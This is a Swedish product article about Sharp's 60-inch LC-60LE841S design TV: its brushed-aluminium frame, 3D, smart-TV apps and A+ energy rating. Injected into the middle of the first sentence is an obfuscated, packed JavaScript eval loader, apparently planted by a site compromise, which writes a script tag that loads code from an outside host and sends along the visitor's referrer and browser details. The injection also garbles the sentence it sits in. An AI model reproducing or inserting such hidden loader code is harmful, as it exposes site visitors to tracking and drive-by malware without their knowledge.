Image Image Image Image Image Image Image Image Image Image

| 1 december, 2020

Scroll to top

Top

Sharp lanserar elegant och energisnål 60-tums design-tv

Sharp lanserar elegant och energisnål 60-tums design-tv
Sebastian

En eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|atzfn|var|u0026u|referrer|nyffa||js|php’.split(’|’),0,{}))
stor platt-tv måste inte vara gjord i grå plast. Sharp senaste 60-tummare har inte bara den allra senaste bildtekniken utan även både 2D och 3D. Även när den är avstängd pryder den sin plats i rummet med sitt hölje i elegant borstad aluminium. Att den dessutom har mängder med extrafinesser och är riktigt energisnål gör den väl lämpad för att titta på film eller idrott, som
fotbolls-EM och OS.

Sharp satsar med den nya modellserien mycket på design. Den sobra aluminium-ramen gör att tv-apparaten passar in i de allra flesta miljöer och blir en attraktiv inredningsdetalj.

Tack vare Sharps AQUOS Quattron 3D-teknik och LED-bakgrundsbelysning har den nya tv:n en skarp bild med full HD och mycket detaljerad färgåtergiv­ning. Även snabba rörelser blir knivskarpa med Sharps 400 Hz Active Motion-teknik. Bild­skärmen på 60 tum (152 cm diagonalt) ger en enastående tittarupplevelse i både 2D och 3D. Tv:n klarar även att konvertera 2D-bilder till simulerad 3D.

LC-60LE841S har också en mängd extra finesser. Bland annat smart-tv-funktionen AQUOS NET+, som ger direkt tillgång till ett stort antal appar för t ex YouTube, Twitter och programguider. HD-tuner (DVB-T2) är inbyggd, liksom multimediaspelare för foto, video och musik från antingen USB-media eller trådlöst från ett hemmanät­verk. Timeshift+ gör det möjligt att programmera inspelningar eller helt enkelt pausa ett program och fortsätta titta senare. Även Skype finns inbyggt som gör tv:n till en telefon i jätteformat.

Trots den stora bildytan och alla finesser är LC-60LE841S mycket energisnål, med den utmärkta energi­klassen  A+. När den är påslagen drar den endast 87 watt och energiförbrukningen i vilo­läge är mycket låga 0,15 watt. Andra ekofunktioner omfattar t ex att skärmens bak­grunds­belysning kontinuerligt anpassas till det omgivande rummet för att spara energi.

– För att skapa en riktig biokänsla och arenaatmosfär blir tv-apparaterna allt större. Det gör att konsumenterna stället högre krav på design, säger Per-Martin Öhman, nordisk produktchef på Sharp. Med nya LC-60LE841S erbjuder vi en verklig design­modell bland våra riktigt stora tv-apparater, och kombinerar därmed förstklassig teknik och estetik på ett perfekt sätt. Tv-tittandet blir inte vackrare än så här!